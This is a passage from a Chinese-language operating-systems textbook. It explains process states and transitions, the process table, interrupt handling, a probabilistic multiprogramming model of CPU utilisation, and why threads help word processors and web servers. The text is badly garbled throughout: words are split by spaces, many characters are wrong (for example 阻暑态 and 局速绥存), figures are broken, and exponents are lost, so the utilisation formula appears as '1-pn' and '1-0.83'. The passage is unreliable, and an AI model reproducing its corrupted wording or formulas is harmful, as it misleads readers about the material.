术 上 的 原因 引起 的 “由 于 没有 足够 的 CPU， 所 以 不 能 使 每 个 进程 都 有 一 
台 它 私 用 的 处 理 器 〉。 在 图 2-2 中 可 以 看 到 显示 进程 的 三 种 状态 的 状态 
图 。 这 三 种 状态 是 











1) 运 行 态 (该 时 刻 进程 实际 占用 CPU) 。 





2) 束 绪 态 《可 运行 ， 但 因为 其 他 进程 正在 运行 而 暂时 停止 〉。 





3) 阻 暑 态 除非 条 种 外 部 事件 及 生 ， 否 则 进程 不 能 运行 )。 


前 两 种 状态 在 逻辑 上 是 类 似 的 。 处 于 这 两 种 状态 的 进程 都 可 以 运 
行 ， 只 是 对 于 第 二 种 状态 暂时 没有 CPU 分 配给 它 。 第 三 种 状态 与 前 两 种 
状态 不 同 ， 处 于 该 状态 的 进程 不 能 运行 ， 即 使 CPU 空闲 也 不 行 。 





进程 的 三 种 状态 之 间 有 四 种 可 能 的 转换 关系 ， 如 图 2-2 所 示 。 在 操 
作 系 统 发 现 进程 不 能 继续 运行 下 去 时 ， 发 生 转换 1。 在 茶 些 系统 中 ， 进 
程 可 以 执行 一 个 诸如 pause 的 系统 调用 来 进入 阻塞 状态 。 在 其 他 系统 
中 ， 包 括 UNIX， 当 一 个 进程 从 管道 或 设备 文件 《例如 终端 ) 读 取 数 据 
时 ， 如 果 没 有 有 效 的 输入 存在 ， 则 进程 会 被 目 动 阻 丝 。 


1. 进程 为 等 得 输入 而 阻塞 
. 调度 程序 选择 男 一 个 进程 
调度 程序 选择 这 个 进程 
出 现 有 效 输入 


wD 





图 2-2 一 个 进程 可 处 于 运行 态 、 阻 塞 态 和 就 绪 态 ， 图 中 显示 出 各 状 
态 之 间 的 转换 


转换 2 和 3 是 由 进程 调度 程序 引起 的 ， 进 程 调 度 程 序 是 操作 系统 的 一 
部 分 ， 进 程 甚至 感觉 不 到 调度 程序 的 存在 。 系 统 认为 一 个 运行 进程 占用 
处 理 占 的 时 间 已 经 过 长 ， 决 定 让 其 他 进程 使 用 CPU 时 间 时 ， 会 发 生 转 换 
2。 在 系统 已 经 让 所 有 其 他 进程 吝 有 了 它们 应 有 的 公平 竺 遇 而 重新 轮 到 
第 一 个 进程 再 次 占用 CPU 运行 时 ， 会 发 生 转 换 3。 调 度 程序 的 主要 工作 
就 是 决定 应 当 运 行 哪个 进程 、 何 时 运行 及 它 应 该 运行 多 长 时 间 ， 这 是 很 
重要 的 一 把， 我 们 将 在 本 间 的 后 面部 分 进行 讨论 。 已 经 提出 了 许多 算 
法 ， 这 些 算 法 力图 在 整体 效率 和 进程 的 竞争 公平 性 之 间 取 得 平衡 。 我 们 


将 在 本 章 各 后 部 分 研究 其 中 的 一 些 问题 。 























当 进 程 等 待 的 一 个 外 部 事件 发 生 时 《如 一 些 输入 到 达 ) ， 则 发 生 转 
换 4。 如 采 此 时 没有 其 他 进程 运行 ， 则 立即 触发 转换 3， 该 进程 便 开 始 运 
行 。 人 否则 该 进程 将 处 于 就 绪 态 ， 等 待 CPU 空闲 并 且 轮 到 它 运 行 。 


使 用 进程 模型 使 得 我 们 易于 想象 系统 内 部 的 操作 状况 。 一 些 进程 正 
在 运行 执行 用 户 键 入 命令 所 对 应 的 程序 。 力 一 些 进程 是 系统 的 一 部 分 ， 
它们 的 任务 是 完成 下 列 一 些 工作 : 比如 ， 执 行文 件 服务 请 求 、 管 理 磁盘 
驱动 器 和 磁带 机 的 运行 细 市 等 。 当 发 生 一 个 磁盘 中 断 时 ， 系 统 会 做 出 诀 
定 ， 停 止 运行 当前 进程 ， 转 而 运行 磁盘 进程 ， 该 进程 在 此 之 前 因 等 竺 中 
上 晰 而 处 于 阻塞 态 。 这 样 ， 我 们 就 可 以 不 再 考虑 中 断 ， 而 只 是 考虑 用 户 进 
程 、 磁 盘 进 程 、 终 端 进程 等 。 这 些 进 程 在 等 待 时 总 是 处 于 阻 豆 状态 。 在 
己 经 读 入 磁盘 或 键入 字符 后 ， 等 待 它们 的 进程 束 被 解除 阻塞 ， 并 成 为 可 




















调度 运行 的 进程 。 





从 这 个 观 后 引出 了 图 2-3 所 示 的 模型 。 在 图 2-3 中 ， 操 作 系 统 的 最 抵 
层 是 调度 程序 ， 在 它 上 面 有 许多 进程 。 所 有 关于 中 断 处 理 、 局 动 进 程 和 
停止 进程 的 具体 细 市 都 隐藏 在 调度 程序 中 。 实 际 上 ， 调 度 程 序 是 一 段 非 
常 短小 的 程序 。 操 作 系 统 的 其 他 部 分 被 简单 地 组 织 成 进程 的 形式 。 不 
过 ， 很 少 有 真实 的 系统 是 以 这 样 的 理想 方式 构造 的 。 


进程 


图 2-3 以 进程 构造 的 操作 系统 最 底层 处 理 中 断 和 调度 ， 在 该 层 之 上 


是 顺序 进程 











2.1.6 ”进程 的 实现 





为 了 实现 进程 模型 ， 操 作 系统 维护 着 一 张 表格 〈 一 个 结构 数组 ) ， 
即 进程 表 (process table) 。 每 个 进程 占用 一 个 进程 表 项 。《〈 有 些 作者 称 
这 些 表 项 为 进程 控制 块 。)〉 该 表 项 包含 了 进程 状态 的 重要 信息 ， 包 括 程 
序 计数 器 、 堆 栈 指针 、 内 存 分 配 状 况 、 所 打开 文件 的 状态 、 账 号 和 调度 
言 思 ， 以 及 其 他 在 进程 由 运行 态 转换 到 就 绪 态 或 阻 压 态 时 必须 保存 的 信 
昌 ， 从 而 保证 该 进程 随后 能 再 次 启动， 就 像 从 未 被 中 断 过 一 样 。 








图 2-4 中 展示 了 在 一 个 典型 系统 中 的 关键 字段 。 第 一 列 中 的 字段 与 
进程 管理 有 关 。 其 他 两 列 分 别 与 存储 管理 和 文件 管理 有 关 。 应 该 注意 到 
进程 表 中 的 字段 是 与 系统 密切 相关 的 ， 不 过 该 图 给 出 了 所 需要 信息 的 大 


致 介绍 。 





| 进程 管理 存储 管理 文件 管理 
| 寄存 器 正文 段 指针 根 目 录 

| 程序 计数 器 数据 段 指针 | 工作 目录 
程序 状态 字 堆栈 段 指 针 | 文件 描述 符 
堆栈 指针 HID 
进程 状态 组 ID 

优先 级 
调度 参数 





进程 ,开始 时 间 
使 用 的 CPU 时 间 
子 进程 的 CPU 时 间 
下 次 报警 时 间 














图 2-4 典型 的 进程 表 表 项 中 的 一 些 字段 


在 了 解 进程 表 后 ， 就 可 以 对 在 单个 《或 每 一 个 ) CPU 上 如 何 维持 多 
个 顺序 进程 的 错觉 做 更 多 的 曾 述 。 与 每 一 UO 类 关联 的 是 一 个 称 作 中 断 
HÆ (interrupt vector) 的 位 置 《靠近 内 存 底部 的 固定 区 域 ) 。 它 包含 中 
晰 服务 程序 的 入 口 地 址 。 假 设 当 一 个 磁盘 中 断 发 生 时 ， 用 户 进程 3 正在 
运行 ， 则 中 断 硬件 将 程序 计数 器 、 程 序 状态 字 ， 有 时 还 有 一 个 或 多 个 寄 
存 器 压 入 堆栈 ， 计 算 机 随即 跳 转 到 中 断 向 量 所 指示 的 地 址 。 这 些 是 硬件 
完成 的 所 有 操作 ， 然 后 软件 ， 特 别 是 中 断 服务 例 程 就 接管 一 切 剩余 的 工 
ites 














所 有 的 中 断 都 从 保存 寄存 器 开始 ， 对 于 当前 进程 而 言 ， 通 种 是 在 进 


程 表 项 中 。 随 后 ， 会 从 堆栈 中 删除 由 中 断 硬 件 机 制 存 入 堆栈 的 那 部 分 信 
忠 ， 并 将 堆栈 指针 指向 一 个 由 进程 处 理 程 序 所 使 用 的 临时 堆栈 。 一 些 诸 
如 保存 寄存 器 值 和 设置 堆栈 指针 等 操作 ， 无 法 用 C 语 言 这 一 类 高 级 语言 
描述 ， 所 以 这 些 操作 通过 一 个 短小 的 汇编 语言 例 程 来 完成 ， 通 向 该 例 程 
可 以 供 所 有 的 中 断 使 用 ， 因 为 无 论 中 断 是 怎样 引起 的 ， 有 关 保 存 寄存 器 
的 工作 则 是 完全 一 样 的 。 











当 该 例 程 结束 后 ， 它 调用 一 个 C 过 程 处 理 某 个 特定 的 中 断 类 型 剩 下 
的 工作 。《 假 定 操作 系统 由 C 语 言 编写 ， 通 第 这 是 所 有 真实 操作 系统 的 
选择 ) 。 在 完成 有 关 工 作 之 后 ， 大 概 束 会 使 条 些 进程 束 绪 ， 接 着 调用 调 
度 程 序 ， 决 定 随后 该 运行 哪个 进程 。 随 后 将 控制 转 给 一 段 汇 编 语言 代 
码 ， 为 当前 的 进程 六 入 寄存 器 值 以 及 内 存 映 财 并 局 动 该 进程 运行 。 图 2- 
5 中 总 结 了 中 断 处 理 和 调度 的 过 程 。 值 得 注意 的 是 ， 各 种 系统 之 间 茶 些 
细节 会 有 所 不 同 。 

















. 便 件 压 入 堆栈 程序 计数 器 等 。 

. 便 件 从 中 断 向 量 装 入 新 的 程序 计数 器 。 

.汇编 语言 过 程 保 存 寄存 器 值 。 

汇编 语言 过程 设置 新 的 堆栈 。 

.C 中 断 服 务 例 程 运 行 (典型 地 读 和 缓冲 输入 )。 
. 调度 程序 决定 下 一 个 将 运行 的 进程 。 

. C 过 程 返回 至 汇编 代码 。 

. 汇编 语言 过 程 开 始 运 行 新 的 当前 进程 。 
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图 2-5 中 断 发 生 后 操作 系统 最 底层 的 工作 步 又 


当 该 进程 结束 时 ， 操 作 系统 显示 一 个 提示 符 并 等 待 新 的 命令 。 





它 接 到 新 命令 ， 就 装 入 新 的 程序 进 内 存 ， 敢 再 前 一 个 程序 。 


2.1.7 多 道 程序 设计 模型 


采用 多 道 程序 设计 可 以 提高 CPU 的 利用 率 。 严 格 地 说 ， 如 果 进 程 用 
于 计算 的 平均 时 间 是 进程 在 内 存 中 停留 时 间 的 20%， 且 内 存 中 同时 有 5 
个 进程 ， 则 CPU 将 一 直 满 负载 运行 。 然 而 ， 这 个 模型 在 现实 中 过 于 乐 
观 ， 因 为 它 假设 这 5 个 进程 不 会 同时 等 竺 IO。 





更 好 的 模型 是 从 概率 的 角度 来 看 CPU 的 利用 率 。 假 设 一 个 进程 等 待 
IO 操作 的 时 间 与 其 停留 在 内 存 中 时 间 的 比 为 p。 当 内 存 中 同时 有 n 个 进 
程 时 ， 则 所 有 n 个 进程 都 在 等 待 TO 〈 此 时 CPU 空转 ) 的 概率 是 pn 。CPU 
的 利用 率 由 下 面 的 公式 给 出 : 


CPU 利用 率 =1-pn 





图 2-6 以 n 为 变量 的 函数 表示 了 CPU 的 利用 率 ，n 称 为 多 道 程序 设计 
的 道 数 (degree of multiprogramming) 。 





20% I/O 等 竺 






100 






50% IO 等 竺 





80 






80% I/O 等 待 


40 
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多 道 程 序 设 计 的 道 数 
图 2-6 CPU 利用 率 是 内 存 中 进程 数目 的 函数 


从 图 2-6 中 可 以 清楚 地 看 到 ， 如 果 进 程 花 费 80% 的 时 间 每 等/JO， 为 
使 CPU 的 浪费 低 于 10%， 至 少 要 有 10 个 进程 同时 在 内 存 中 。 当 读者 认识 
到 一 个 等 待 用 户 从 终端 输入 的 交互 式 进程 是 处 于 IO 等 待 状态 时 ， 那 么 
很 明显 ，80% 甚 至 更 多 的 MO 等 待 时 间 是 普遍 的 。 即 使 是 在 服务 器 中 ， 做 
大 量 磁 盘 IO 操 作 的 进程 也 会 花费 同样 或 更 多 的 等 待 时 间 。 





从 完全 精确 的 角度 考虑 ， 应 该 指出 此 概率 模型 只 是 描述 了 一 个 大 致 
的 状况 。 它 假设 所 有 n 个 进程 是 独立 的 ， 即 内 存 中 的 5 个 进程 中 ，3 个 运 
行 ，2 个 等 每 ， 是 完全 可 接受 的 。 但 在 单 CPU 中 ， 不 能 同时 运行 3 个 进 
程 ， 所 以 当 CPU 忙 时 ， 己 就 绪 的 进程 也 必须 等 待 CPU。 因 而 ， 进 程 不 是 





独立 的 。 更 精确 的 模型 应 该 用 排队 论 构 造 ， 但 我 们 的 模型 〈 当 进程 就 绪 
时 ， 给 进程 分 配 CPU， 和 否则 让 CPU 空转 ) 仍然 是 有 效 的 ， 即 使 图 2-6 的 
真实 曲线 会 与 图 中 所 画 的 略 有 不 同 。 


虽然 图 2-6 的 模型 很 简单 ， 很 粗略 ， 它 依然 对 预测 CPU 的 性 能 很 有 
效 。 例 如 ， 假 设计 算 机 有 512MB 内 存 ， 操 作 系统 占用 128MB， 每 个 用 户 
程序 也 占用 128MB。 这 些 内 存 空间 允许 3 个 用 户 程序 同时 驻 留 在 内 存 
中 。 若 80% 的 时 间 用 于 WO 等 待 ， 则 CPU 的 利用 率 (忽略 操作 系统 开销 ) 
大 约 是 1-0.83 ， 即 大 约 49%。 在 增加 512MB 字 节 的 内 存 后 ， 可 从 3 道 程序 
设计 提高 到 7 道 程序 设计 ， 因 而 CPU 利 用 率 提高 到 79%。 换 言 之 ， 第 二 
个 512MB 内 存 提高 了 30% 的 吞吐 量 。 





增加 第 三 个 512MB 内 存 只 能 将 CPU 利 用 率 从 79% 提 高 到 91%， 吞 吐 
量 的 提高 仅 为 12%。 通 过 这 一 模型 ， 计 算 机 用 户 可 以 确定 第 一 次 增加 内 


存 是 一 个 合算 的 投资 ， 而 第 二 个 则 不 是 。 


2.2 ”线程 


在 传统 操作 系统 中 ， 每 个 进程 有 一 个 地 址 空间 和 一 个 控制 线程 。 事 
这 几乎 就 是 进程 的 定义 。 不 过 ， 经 常 存在 在 同一 个 地 址 空间 中 准 
并 行 运行 多 个 控制 线程 的 情形 ， 这 些 线程 就 像 〈 差 不 多 ) 分 离 的 进程 
共享 地 址 空间 除外 ) 。 在 下 面 各 市 中 ， 我 们 将 讨论 这 些 情形 及 其 实 
现 。 





2.2.1 线程 的 使 用 


为 什么 人 们 需要 在 一 个 进程 中 再 有 一 类 进程 ? 有 奋 干 理由 说 明 产 生 
这 些 迷 你 进程 〈《 称 为 线程 ) 的 必要 性 。 下 面 我 们 来 讨论 其 中 一 些 理由 。 
人 们 需要 多 线程 的 主要 原因 是 ， 在 许多 应 用 中 同时 发 生 着 多 种 活动 。 
中 菏 些 活动 随 着 时 间 的 推移 会 被 阻 赛 。 通 过 将 这 些 应 用 程序 分 解 成 可 以 
准 并 行 运行 的 多 个 顺序 线程 ， 程 序 设计 模型 会 变 得 更 简单 。 




















在 前 面 我 们 已 经 进行 了 有 关 讨 论 。 准 确 地 说 ， 这 正 是 之 前 关于 进程 
模型 的 讨论 。 有 了 这 样 的 抽象 ， 我 们 才 不 必 考 虑 中 断 、 定 时 器 和 上 下 文 
切换 ， 而 只 需 考 察 并 行进 程 。 类 似 地 ， 只 是 在 有 了 多 线程 概念 之 后 ， 我 
们 才 加 入 了 一 种 新 的 元 素 : 并 行 实体 共享 同一 个 地 址 空间 和 所 有 可 用 数 
据 的 能 力 。 对 于 某 些 应 用 而 言 ， 这 种 能 力 是 必需 的 ， 而 这 正 是 多 进程 模 











型 《它们 有 具有 不 同 地 址 空间 ) 上 所 无 法 表达 的 。 


第 二 个 关于 需要 多 线程 的 理由 是 ， 由 于 线程 比 进程 更 轻 量 级 ， 所 以 
它们 比 进程 更 容易 〈 即 更 快 ) 创建 ， 也 更 容易 撤销 。 在 许多 系统 中 ， 创 
建 一 个 线程 较 创 建 一 个 进程 要 快 10 一 100 倍 。 在 有 大 量 线程 需要 动态 和 
快速 修改 时 ， 具 有 这 一 特性 是 很 有 用 的 。 








需要 多 线程 的 第 三 个 原因 涉及 性 能 方面 的 讨论 。 奉 多 个 线程 都 是 
CPU 和 密集 型 的 ， 那 么 并 不 能 获得 性 能 上 的 增强 ， 但 是 如 果 存 在 着 大 量 的 
计算 和 大 量 的 VO 人 处理， 拥有 多 个 线程 允许 这 些 活动 彼此 重 全 进行， 从 
而 会 加 快 应 用 程序 执行 的 速度 。 


最 后 ， 在 多 CPU 系 统 中 ， 多 线程 是 有 荔 的 ， 在 这 样 的 系统 中 ， 真 下 
的 并 行 有 了 实现 的 可 能 。 我 们 会 在 第 8 章 讨 论 这 个 主题 。 











通过 考察 一 些 典 型 例子 ， 我 们 束 可 以 更 清楚 地 看 出 多 线程 的 有 益 之 
处 。 作 为 第 一 个 例子 ， 考 虑 一 个 字 处 理 软件 。 字 处 理 软件 通常 按照 出 现 
在 打印 页 上 的 格式 在 屏 医 上 精确 显示 文档 。 特 别 地 ， 所 有 的 行 分 隅 符 和 
页 分 隔 符 都 在 正确 的 最 终 位 置 上 上， 这样 在 需要 时 用 户 可 以 检查 和 修改 文 
档 ( 比 如， 消除 孤 行 一 一 在 一 页 上 不 完整 的 项 部 行 和 底部 行 ， 因 为 这 些 
行 不 其 美观 ) 。 








假设 用 户 正 在 写 一 本 书 。 从 作者 的 观点 来 看 ， 最 容易 的 方法 是 把 整 
本 书 作为 一 个 文件 ， 这 样 一 来 ， 查 询 内 容 、 完 成 全 局 替换 等 都 非常 容 











易 。 另 一 种 方法 是 ， 把 每 一 章 都 处 理 成 单独 一 个 文件 。 但 是 ， 在 把 每 个 
小 节 和 子 小 节 都 分 成 单个 的 文件 之 后 ， 硝 必须 对 全 书 进行 全 局 的 修改 
时 ， 那 束 真 是 拱 烦 了 ， 因 为 有 成 百 个 文件 必须 一 个 个 地 编辑 。 例 如 ， 如 
果 所 建议 的 茶 个 标准 xxxx 正 好 在 书 付 印 之 前 被 批准 了 ， 于 是 “标准 草 肥 
xxxx” 一 类 的 字眼 就 必须 改 为 “标准 xxxx”。 如 果 整 本 书 是 一 个 文件 ， 那 
么 只 要 一 个 命令 就 可 以 完成 全 部 的 答 换 处 理 。 相 反 ， 如 果 一 本 书 分 成 了 
300 个 文件 ， 那 么 就 必须 分 别 对 每 个 文件 进行 编辑 。 








现在 考虑 ， 如 果 有 一 个 用 户 突 然 在 一 个 有 800 页 的 文件 的 第 一 页 上 
删 掉 了 一 个 语句 之 后 ， 会 发 生 什么 情形 。 在 检查 了 所 修改 的 页 面 并 确认 
正确 后 ， 这 个 用 户 现在 打算 接着 在 第 600 页 上 进行 男 一 个 修改 ， 并 键入 
一 条 命令 通知 字 处 理 软 件 转 到 该 页 面 〈 可 能 要 查阅 只 在 那里 出 现 的 一 个 
短语 ) 。 于 是 字 处 理 软 件 被 强制 对 整个 书 的 前 600 页 重新 进行 格式 处 
理 ， 这 是 因为 在 排列 该 页 前 面 的 所 有 页 面 之 前 ， 字 处 理 软件 并 不 知道 第 
600 页 的 第 一 行 应 该 在 哪里 。 而 在 第 600 页 的 页 面 可 以 真正 在 屏幕 上 显示 
出 来 之 前 ， 计 算 机 可 能 要 拖延 相当 一 段 时 间 ， 从 而 令 用 户 不 其 满意 。 














多 线程 在 这 里 可 以 发 挥 作用 。 假 设 字 处 理 软件 被 编写 成 含有 两 个 线 
程 的 程序 。 一 个 线程 与 用 户 交互 ， 而 另 一 个 在 后 台 重 新 进行 格式 处 理 。 
一 旦 在 第 1 页 中 的 语句 被 删除 掉 ， 交 互 线程 就 立即 通知 格式 化 线程 对 整 
本 书 重新 进行 处 理 。 同 时 ， 交 互 线程 继续 监控 键盘 和 鼠标 ， 并 响应 诸如 
滚动 第 1 页 之 类 的 简单 命令 ， 此 刻 ， 另 一 个 线程 正在 后 台 疯 狂 地 运算 。 














如 果 有 点 运气 的 话 ， 重 新 格式 化 会 在 用 户 请 求 查看 第 600 页 之 前 完成 ， 
这 样 ， 第 600 页 页 面 就 立即 可 以 在 屏幕 上 显示 出 来 。 


如 果 我 们 已 经 做 到 了 这 一 步 ， 那 么 为 什么 不 再 进一步 增加 一 个 线程 
呢 ? 许多 字 处 理 软件 都 有 每 隔 各 干 分 钟 自 动 在 磁盘 上 保存 整个 文件 的 特 
扩 ， 用 于 避免 由 于 程 友 骨 沉 、 系 统 朋 尝 或 电源 故障 而 造成 用 户 一 整 天 的 
工作 丢失 的 情况 。 第 三 个 线程 可 以 处 理 磁盘 备份 ， 而 不 必 干 扰 其 他 两 个 
线程 。 拥 有 三 个 线程 的 情形 ， 如 图 2-7 所 示 。 











图 2-7 有 三 个 线程 的 字 处 理 软件 


如 宁 程 序 是 单线 程 的 ， 那 么 在 进行 磁盘 备份 时 ， 来 目 键 盘 和 鼠标 的 
命令 就 会 被 忽略 ， 直 到 备份 工作 完成 为 止 。 用 户 当 然 会 认为 性 能 很 差 。 
另 一 个 方法 是 ， 为 了 获得 好 的 性 能 ， 可 以 让 键盘 和 鼠标 事件 中 断 磁 盘 备 





份 ， 但 这 样 却 引入 了 复 哥 的 中 断 驱 动 程序 设计 模型 。 如 果 使 用 三 个 线 

程 ， 程 序 设计 模型 就 很 简单 了 。 第 一 个 线程 只 是 和 用 户 交 互 ;， 第 二 个 线 
程 在 得 到 通知 时 进行 文档 的 重新 格式 化 ;第 三 个 线程 周期 性 地 将 RAM 
中 的 内 容 写 到 磁盘 上 。 


很 显然 ， 在 这 里 用 三 个 不 同 的 进程 是 不 能 工作 的 ， 这 是 因为 三 个 线 
程 都 需要 在 同一 个 文件 上 进行 操作 。 通 过 让 三 个 线程 代 将 三 个 进程 ， 
个 线程 共 孚 公共 和 内存 ， 于 是 它们 都 可 以 访问 同一 个 正在 编辑 的 文件 。 





| 





许多 其 他 的 交互 式 程序 中 也 存在 类 似 的 情形 。 例 如 ， 电 子 表格 是 允 
许 用 户 维护 窍 阵 的 一 种 程序 ， 和 矩阵 中 的 一 些 元 素 是 用 户 提 供 的 数据 ;， 忆 
一 些 元 素 是 通过 所 输入 的 数据 运用 可 能 比较 复杂 的 公式 而 得 出 的 计算 结 
果 。 妆 用 户 改 变 一 个 元 素 时 ， 许 多 其 他 元 素 就 必须 重新 计算 。 通 过 一 个 
后 台 线 程 进 行 重新 计算 的 方式 ， 交 互 式 线程 就 能 够 在 进行 计算 的 时 候 ， 
让 用 户 从 事 更 多 的 工作 。 类 似 地 ， 第 三 个 线程 可 以 在 磁盘 上 进行 周期 性 
的 备份 工作 。 





现在 考虑 另 一 个 多 线程 发 挥 作用 的 例子 : 一 个 万 维 网 服务 器 。 对 页 
面 的 请 求 发 给 服务 器 ， 而 所 请 求 的 页 面 发 回 给 客户 机 。 在 多 数 Web 站 点 
上 ， 某 些 页 面 较 其 他 页 面相 比 ， 有 更 多 的 访问 。 例 如 ， 对 Sony 主 页 的 访 
问 就 远 远 超过 对 深 藏 在 页 面 树 里 的 任何 特定 摄像 机 的 技术 说 明 书 页 面 的 
访问 。 利 用 这 一 事实 ，Web 服 务 器 可 以 把 获得 大 量 访问 的 页 面 集 合 保存 
在 内 存 中 ， 避 免 到 磁盘 去 调 入 这 些 页 面 ， 从 而 改善 性 能 。 这 样 的 一 种 页 

















面 集合 称 为 高 速 绥 存 (cache〉， 局 速 绥 存 也 运用 在 其 他 许多 场合 中 。 


例如 在 第 1 章 中 介绍 的 CPU 绥 存 。 


一 种 组 织 Web 服 务 器 的 方式 如 图 2-8 所 示 。 在 这 里 ， 一 个 称 为 分 派 
程序 (dispatcher〉 的 线程 从 网 络 中 读 入 工作 请 求 。 在 检查 请 求 之 后 ， 分 
派 线 程 挑 选 一 个 空转 的 〈 即 被 阻 守 的 ) 工 作 线 程 (worker thread) ， 提 
交 该 请 求 ， 通 常 是 在 每 个 线程 所 配 有 的 某 个 专门 字 中 写 入 一 个 消息 指 
针 。 接 着 分 派 线程 唤醒 睡眠 的 工作 线程 ， 将 它 从 阻塞 状态 转 为 就 绪 状 
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图 2-8 一 个 多 线程 的 Web 服 务 虽 


ons 


在 工作 线程 被 唤醒 之 后 ， 它 检查 有 关 的 请 求 是 否 在 Web 页 面 局 速 绥 
存 之 中 ， 这 个 高 速 缓存 是 所 有 线程 都 可 以 访问 的 。 如 果 没 有 ， 该 线程 开 
始 一 个 从 磁盘 调 入 页 面 的 read 操 作 ， 并 且 阻 赛 直 到 该 磁盘 操作 完成 。 当 
上 述 线程 阻塞 在 磁盘 操作 上 时 ， 为 了 完成 更 多 的 工作 ， 分 派 线 程 可 能 挑 
选 妨 一 个 线程 运行 ， 也 可 能 把 另 一 个 当前 就 绪 的 工作 线程 投入 运行 。 














这 种 模型 允许 把 服务 此 编写 为 顺 厅 线程 的 一 个 集合 。 在 分 派 线 程 的 
程序 中 包含 一 个 无 限 循环 ， 该 循环 用 来 获得 工作 请 求 并 且 把 工作 请 求 派 
给 工作 线程 。 每 个 工作 线程 的 代码 包含 一 个 从 分 派 线 程 接 收 请 求 ， 并 且 
检查 Web 局 速 绥 存 中 是 否 存 在 所 需 页 面 的 无 限 循环 。 如 果 存 在 ， 束 将 该 
页 面 返回 给 客户 机 ， 接 着 该 工作 线程 阻塞 ， 等 竺 一 个 新 的 请 求 。 如 果 没 
有 ， 工 作 线程 就 从 磁盘 调 入 该 页 面 ， 将 该 页 面 返回 给 客户 机 ， 然 后 该 工 
作 线 程 阻 塞 ， 等 待 一 个 新 的 请 求 。 




















图 2-9 给 出 了 有 关 代 码 的 大 致 框架 。 如 同 本 书 的 其 他 部 分 一 样 ， 这 
里 假设 TRUE 为 常数 1。 男 外 ，buf 和 page 分 别 是 保存 工作 请 求 和 Web 页 
面 的 相应 结构 。 


while (TRUE) { while (TRUE) { 
get_next_request(&buf); wait_for_work(&buf) 
handoff_work(&buf); look_for_page_in_cache(&buf, &page); 
if (page_not_in_cache(&page)) 


read_page_from_disk(&buf, &page); 
return_page(&page); 





图 2-9 对 应 图 2-8 的 代码 概要 : 四 分派 线程 ; 工作 线程 





现在 考虑 在 没有 多 线程 的 情形 下 ， 如 何 编写 web 服务器 。 一 种 可 能 
的 方式 是 ， 使 其 像 一 个 线程 一 样 运行 。Web 服 务 器 的 主 循环 获得 请 求 ， 
检查 请 求 ， 并 且 在 取 下 一 个 请 求 之 前 完成 整个 工作 。 在 等 竺 磁盘 操作 
时 ， 服 务 器 就 空转 ， 并 且 不 处 理 任 何 到 来 的 其 他 请 求 。 如 果 该 Web 服 务 
需 运 行 在 惟一 的 机 器 上 ， 通 种 情形 都 是 这 样 ， 那 么 在 等 竺 磁盘 操作 时 
CPU 只 能 空转 。 结 果 导 致 每 秒 钟 只 有 很 少 的 请 求 被 处 理 。 可 见 线程 较 好 
地 改善 了 了 Web 服务 器 的 性 能 ， 而 且 每 个 线程 是 按 通 常 方 式 顺 序 编程 的 。 








到 现在 为 止 ， 我们 有 了 两 个 可 能 的 设计 ; 多 线程 Web 服 务 器 和 单线 
程 Web 服 务 器 。 假 设 没有 多 线程 可 用 ， 而 系统 设计 者 又 认为 由 于 单线 程 
所 造成 的 性 能 降低 是 不 能 接受 的 ， 那 么 如 果 可 以 使 用 read 系 统 调用 的 非 
阻 竖 版 本 ， 还 存在 第 三 种 可 能 的 设计 。 在 请 求 到 来 时 ， 这 个 惟一 的 线程 
对 请 求 进行 考察 。 如 果 该 请 求 能 够 在 高 速 缓存 中 得 到 满足 ， 那 么 一 切 都 
好 ， 如 采 不 能 ， 则 月 动 一 个 非 阻塞 的 磁盘 操作 。 








服务 器 在 表格 中 记录 当前 请 求 的 状态 ， 然 后 去 处 理 下 一 个 事件 。 下 
一 个 事件 可 能 是 一 个 新 工作 的 请 求 ， 或 是 磁盘 对 先前 操作 的 回答 。 如 果 
古刹 工作 的 请 求 ， 就 开始 该 工作 。 如 果 是 磁盘 的 回答 ， 束 从 表格 中 取出 
对 应 的 信息 ， 并 处 理 该 回答 。 对 于 非 阻 塞 磁 盘 IO 而 言 ， 这 种 回答 多 数 
会 以 信号 或 中 断 的 形式 出 现 。 








在 这 一 设计 中 ， 前 面 两 个 例子 中 的 “顺序 进程 ?模型 消失 了 。 每 次 服 
务 句 从 为 东 个 请 求 工作 的 状态 切换 到 另 一 个 状态 时 ， 都 必须 显 式 地 保存 
或 重新 逆 入 相应 的 计算 状态 。 事 实 上 ， 我 们 以 一 种 困难 的 方式 模拟 了 线 
程 及 其 堆栈 。 这 里 ， 每 个 计算 都 有 一 个 被 保存 的 状态 ， 存 在 一 个 会 发 生 
且 使 得 相关 状态 发 生 改 变 的 事件 集合 ， 我 们 把 这 类 设计 称 为 有 限 状 态 机 
(finite-state machine) 。 有 限 状 态 机 这 一 概念 广泛 地 应 用 在 计算 机 科学 
中 。 


现在 很 清楚 多 线程 必须 提供 的 是 什么 了 。 多 线程 使 得 顺序 进程 的 思 
想 得 以 保留 下 来 ， 这 种 顺序 进程 阻塞 了 系统 调用 〈 如 磁盘 IO) ， 但 是 
仍旧 实现 了 并 行 性 。 对 系统 调用 进行 阻塞 使 程序 设计 变 的 较为 简单 ， 而 
且 并 行 性 改善 了 性 能 。 单 线程 服务 器 虽然 保留 了 阻塞 系统 调用 的 简易 
性 ， 但 是 却 放弃 了 性 能 。 第 三 种 处 理 方法 运用 了 非 阻 塞 调用 和 中 断 ， 通 
过 并 行 性 实现 了 高 性 能 ， 但 是 给 编程 增加 了 困难 。 在 图 2-10 中 给 出 了 上 
述 模式 的 总 结 。 



















特性 
并 行 性 、 阻 塞 系统 调用 
无 并 行 性 、 阻 塞 系统 调用 
并 行 性 、 非 阻塞 系统 调用 、 中 断 | 


模型 
多 线程 
单线 程 进 各 
有 限 状态 机 


























图 2-10 构造 服务 器 的 三 种 方法 


有 关 多 线程 作用 的 第 三 个 例子 是 那些 必须 处 理 极 大 量 数据 的 应 用 。 


通 第 的 处 理 方式 是 ， 读 进 一 块 数据 ， 对 其 处 理 ， 然 后 再 写 出 数据 。 这 里 
的 问题 是 ， 如 果 只 能 使 用 阻塞 系统 调用 ， 那 么 在 数据 进入 和 数据 输出 
时 ， 会 阻 赛 进 程 。 在 有 大 量 计算 需要 处 理 的 时 候 ， 让 CPU 空转 显然 是 恨 
费 ， 应 该 尽 可 能 避免 。 


多 线程 提供 了 一 种 解决 方案 ， 有 关 的 进程 可 以 用 一 个 输入 线程 、 一 
个 处 理 线程 和 一 个 输出 线程 构造 。 输 入 线程 把 数据 读 入 到 输入 缓冲 区 
中 ; 处 理 线程 从 输入 绥 冲 区 中 取出 数据 ， 处 理 数据 ， 并 把 结果 放 到 输出 
